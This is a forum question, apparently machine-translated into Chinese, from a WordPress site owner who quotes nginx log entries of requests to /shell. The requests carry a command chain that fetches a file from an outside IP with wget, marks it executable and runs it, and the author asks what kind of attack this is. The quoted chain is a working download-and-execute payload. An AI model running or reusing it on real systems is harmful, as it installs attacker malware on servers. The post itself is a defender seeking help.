这是哪种类型的黑客攻击尝试?从不存在的 URL 中获取不存在的外壳文件

我在我的网站上使用Wordpress，最近我阻止了一个黑客，该黑客用大量后门(字面意思是数千个后门(感染了我的网站。我花了一个半月的时间和他打赌。这不是我的错，在我之前工作的人从来没有更新过网站。

在此之后，我注意到一些对不存在的文件的奇怪访问，我认为黑客正试图从我不使用的 wordpress 插件中找到已知的漏洞。没关系，我根本不在乎。但其中一次尝试引起了我的注意。

95.249.95.104 - - [17/Jan/2020:10:17:29 -0300] "karin***com.br" "GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/x5C/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE HTTP/1.1" 400 552 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" "-"
94.200.107.2 - - [17/Jan/2020:13:52:28 -0300] "karin***com.br" "GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/x5C/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE HTTP/1.1" 400 552 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" "-"
197.226.122.184 - - [17/Jan/2020:14:57:36 -0300] "karin***com.br" "GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/x5C/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE HTTP/1.1" 400 552 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" "-"

我隐藏了部分网址，抱歉。

IP总是在变化，即使是连续的请求，差异小于一秒，可能是DDoS。用户代理通常也会发生变化，这里有一切：iPhone，iPad，Android，Windows 7,8,10，Firefox，Google Chrome，Internet Explorer......但是Linux和Mac。这 3 个请求是唯一的例外。

我注意到 URL 上有一些 shell 命令。这些：

cd /tmp;
rm -rf .j;
wget http://91.92.66.124/..j/.j;
chmod 777 .j;
sh .j;
echo DONE HTTP/1.1

我的/tmp 目录上没有具有此名称的文件夹或文件。

这个"karin"URL是一个已经存在很长时间的旧网站。我不知道他是怎么知道这个网址的，连我也不知道。每次我尝试访问在 NGINX 上配置的一些 URL，但路径不存在，就像这样 karin，我都收到 404 错误。但是这些尝试给出了 400 错误。

404是正常的，这是因为这里什么都没有。但是400？这意味着这里有一些东西，但它无法处理发送的数据。我删除了此URL的nginx配置，并在其他URL中尝试了它。我总是收到 404 错误，我试过这个：

***.***.***.*** - - [17/Jan/2020:15:29:20 -0300] "joa***com.br" "GET /shell?cd+/var/www/html/conf;mkdir+teste HTTP/1.1" 404 555 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36" "-"

所以我的问题是：我应该害怕这个命令在这个 URL 上返回 400 错误吗？为什么我不能重现这个？当然，这些尝试失败了，我应该确定他们失败了吗？这是哪种类型的攻击？我从未听说过像这样的"通过 URL 注入 shell 脚本"。